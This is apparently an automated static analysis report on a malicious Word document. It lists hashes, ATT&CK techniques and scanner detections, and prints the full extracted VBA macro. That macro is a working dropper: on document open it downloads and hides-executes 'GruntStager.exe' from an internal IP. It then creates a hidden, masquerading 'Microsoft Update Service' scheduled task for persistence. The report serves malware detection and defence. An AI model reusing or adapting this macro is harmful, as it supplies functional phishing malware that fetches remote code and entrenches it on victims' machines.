Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 e3254193acc6878e…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 20.9 KB
Created: 2021-10-22 06:07:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-10-26

MD5: dcbc96c7b03f3d69d0ee826bf04811f8
SHA-1: c65b9a8081a1eda7a94f3756a85329e78289d804
SHA-256: e3254193acc6878e26d08832d3b343b6f9698df06702aaa171129a58224951d8

Risk score: 358

Malware Insights

MITRE ATT&CK

  • T1059.005 Visual Basic
  • T1105 Ingress Tool Transfer
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The AutoOpen macro calls a Download function that fetches a file named 'GruntStager.exe' from the embedded server URL (http://192.168.20.107), saves it to the user's temporary directory, and then executes it. The macro also attempts to establish persistence by registering a scheduled task whose description is 'Microsoft Update Service'.

Heuristics (9)

  • ClamAV: Doc.Downloader.Valyria-10002610-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10002610-0
  • VBA project inside OOXML [medium, OOXML_VBA] (6 related findings)
    Document contains a VBA project (VBA macros present)
  • Potential Shell call in VBA [critical, OLE_VBA_SHELL]
    Matched line in script:
        Shell path, vbHide
  • VBA downloads and writes a file to disk [critical, OLE_VBA_HTTP_DROP_EXEC]
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec and Shell paths this is a download-and-drop dropper, even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script:
        oStream.Write WinHttpReq.responseBody
  • CreateObject call [high, OLE_VBA_CREATEOBJ]
    Matched line in script:
        Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches p-code-only macro documents, or documents where source extraction failed, so the finding does not depend on the visible source.
  • AutoOpen macro [low, OLE_VBA_AUTOOPEN]
    Matched line in script:
        Sub AutoOpen()
  • Environ() call (environment variable access) [low, OLE_VBA_ENVIRON]
    Matched line in script:
        path = Environ("TEMP") & "\" & Payload
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://192.168.20.107 (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2014/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex (referenced by macro)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/ink (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2017/model3d (referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (referenced by macro)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (referenced by macro)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordml (referenced by macro)
    • http://schemas.microsoft.com/office/word/2012/wordml (referenced by macro)
    • http://schemas.microsoft.com/office/word/2018/wordml/cex (referenced by macro)
    • http://schemas.microsoft.com/office/word/2016/wordml/cid (referenced by macro)
    • http://schemas.microsoft.com/office/word/2018/wordml (referenced by macro)
    • http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash (referenced by macro)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (referenced by macro)
    • http://schemas.microsoft.com/office/word/2006/wordml (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (referenced by macro)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 3252 bytes
SHA-256: 7db3c71695ecedd42c9381089a63beacccd029da1cec024e12c3af5230b2aa8a

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoOpen()
    'Define our malicious execution
    Dim Payload As String
    Payload = "GruntStager.exe"
    Dim Server As String
    Server = "http://192.168.20.107"
    Dim path As String
    path = Download(Server, Payload)
    Shell path, vbHide
    Persist (path)
End Sub

Private Function Download(Server As String, Payload As String) As String
    'Download and save the payload, then return its path...
    

Dim path As String
path = Environ("TEMP") & "\" & Payload
Dim url As String
url = Server & "/" & Payload

Dim WinHttpReq
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", url, False
WinHttpReq.Send

If WinHttpReq.Status <> 200 Then
    Exit Function
End If

Set oStream = CreateObject("ADODB.Stream")
oStream.Open
oStream.Type = 1
oStream.Write WinHttpReq.responseBody
oStream.SaveToFile path, 2
oStream.Close
Download = path
Shell path, vbHide

End Function

Private Function Persist(Payload As String)
    'Create and execute the scheduled task...


'Get the COM Scheduling Service and connect
Set service = CreateObject("Schedule.Service")
service.Connect

'Get the root folder
Dim rootFolder
Set rootFolder = service.GetFolder("\")

'Create a new task definition
Dim taskDefinition
Set taskDefinition = service.newTask(0)

'Perform basic T1036 masquerading
Dim regInfo
Set regInfo = taskDefinition.RegistrationInfo
regInfo.Description = "Microsoft Update Service"
regInfo.Author = "Microsoft Corporation"

'Have the task run as the compromised user
Dim principal
Set principal = taskDefinition.principal
principal.LogonType = 3

'Define a trigger for our service
Dim triggers
Set triggers = taskDefinition.triggers
Dim trigger
Set trigger = triggers.Create(9)
trigger.ID = "LogonTriggerId"
trigger.Enabled = True
trigger.UserId = Environ("USERDOMAIN") & "\" & Environ("USERNAME")
trigger.Delay = "PT1M"  'Delay service execution

'Get settings
Dim settings
Set settings = taskDefinition.settings
settings.Enabled = True
settings.StartWhenAvailable = True
    
'T1158: Hidden Files and Directories (and now services)
settings.Hidden = True
  
'Prevent our service from timing-out
settings.ExecutionTimeLimit = "PT0S"
settings.AllowHardTerminate = False
  
'Avoid duplicate services
settings.MultipleInstances = 2
  
'Restart our service after 1 minute if we crash
settings.RestartInterval = "PT1M"
  
'Restart our service many, many... many times
settings.RestartCount = 999
  
'Ensure our service runs, regardless of the battery status
settings.StopIfGoingOnBatteries = False
settings.DisallowStartIfOnBatteries = False

'Define our service's action
Dim Action
Set Action = taskDefinition.Actions.Create(0)
Action.path = Payload

'Register our task
Dim task
Set task = rootFolder.RegisterTaskDefinition("Microsoft Update Service", taskDefinition, 6, , , 3)

End Function

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 20480 bytes
SHA-256: 193b2cd32a23d38b500c865fb86a672447cc1c56f93b305c0ef8fc192e265a1c
Detection: ClamAV: Doc.Downloader.Valyria-10002610-0
Obfuscation or payload: unlikely